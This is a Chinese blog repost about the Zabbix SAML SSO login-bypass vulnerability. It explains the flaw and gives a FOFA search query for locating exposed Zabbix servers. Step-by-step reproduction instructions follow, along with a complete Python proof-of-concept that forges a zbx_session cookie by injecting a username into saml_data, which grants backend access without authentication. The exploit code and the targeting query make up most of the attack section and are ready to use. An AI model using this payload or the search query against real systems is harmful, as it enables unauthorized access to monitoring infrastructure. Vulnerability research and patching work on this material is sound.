Zabbix SAML SSO 登录绕过漏洞的操作流程

目录
  • 一、简介
  • 二、FOFA语法
  • 三、复现流程

一、简介

zabbix是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。zabbix能监视各种网络参数,保证服务器系统的安全运营;并提供灵活的通知机制以让系统管理员快速定位/解决存在的各种问题。

zabbix server可以通过SNMP,zabbix agent,ping,端口监视等方法提供对远程服务器/网络状态的监视,数据收集等功能,它可以运行在Linux,Solaris,HP-UX,AIX,Free BSD,Open BSD,OS X等平台上。

该漏洞源于在启用 saml SSO 身份验证(非默认)的情况下,未身份验证的攻击者可以修改会话数据,成功绕过前台进入后台,因为存储在会话中的用户登录未经过验证。

漏洞的限制条件:需要启用 SAML 身份验证,并且攻击者必须知道 Zabbix 用户的用户名。

二、FOFA语法

app=“ZABBIX-监控系统” && body=“SAML”

三、复现流程

1、通过fofa语法搜索zabbix资产访问首页获取set-cookie中zbx_session参数的值

2、通过Url解码和Base64解码获得zbx_session参数Json格式数据

3、通过在Json中添加saml_data和username_attribute参数后重新Base64编码和Url编码构造Payload

4、把构造好的payload进行base64编码和url编码

5、请求index_sso.php,在http请求头中构造payload,将zbx_session的值替换为url编码后的payload

6、成功登录后台

可利用poc直接获取构造后的payload

poc:

?

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

import requests

import re

import urllib.parse

import base64

import json

import sys

def exp(target, username):

resp = requests.get(url=target, verify=False)

cookie = resp.headers.get("Set-Cookie")

zbx_session = re.findall(r"zbx_session=(.*?); ", cookie)

url_decode_data = urllib.parse.unquote(zbx_session[0], encoding='utf-8')

base64_decode_data = base64.b64decode(url_decode_data)

decode_to_str = str(base64_decode_data, encoding='utf-8')

to_json = json.loads(decode_to_str)

tmp_ojb = dict(saml_data=dict(username_attribute=username), sessionid=to_json["sessionid"], sign=to_json["sign"])

payloadJson = json.dumps(tmp_ojb)

print("decode_payload:", payloadJson)

payload = urllib.parse.quote(base64.b64encode(payloadJson.encode()))

print("zbx_signed_session:", payload)

if __name__ == "__main__":

if len(sys.argv) != 3:

print("argv error")

exit(0)

target = sys.argv[1]

username = sys.argv[2]

exp(target, username)

到此这篇关于Zabbix SAML SSO 登录绕过漏洞的文章就介绍到这了,更多相关Zabbix 登录绕过漏洞内容请搜索服务器之家以前的文章或继续浏览下面的相关文章希望大家以后多多支持服务器之家!

原文地址:https://blog.csdn.net/Adminxe/article/details/123227862

本文链接:https://my.lmcjl.com/post/7073.html

展开阅读全文

4 评论

留下您的评论.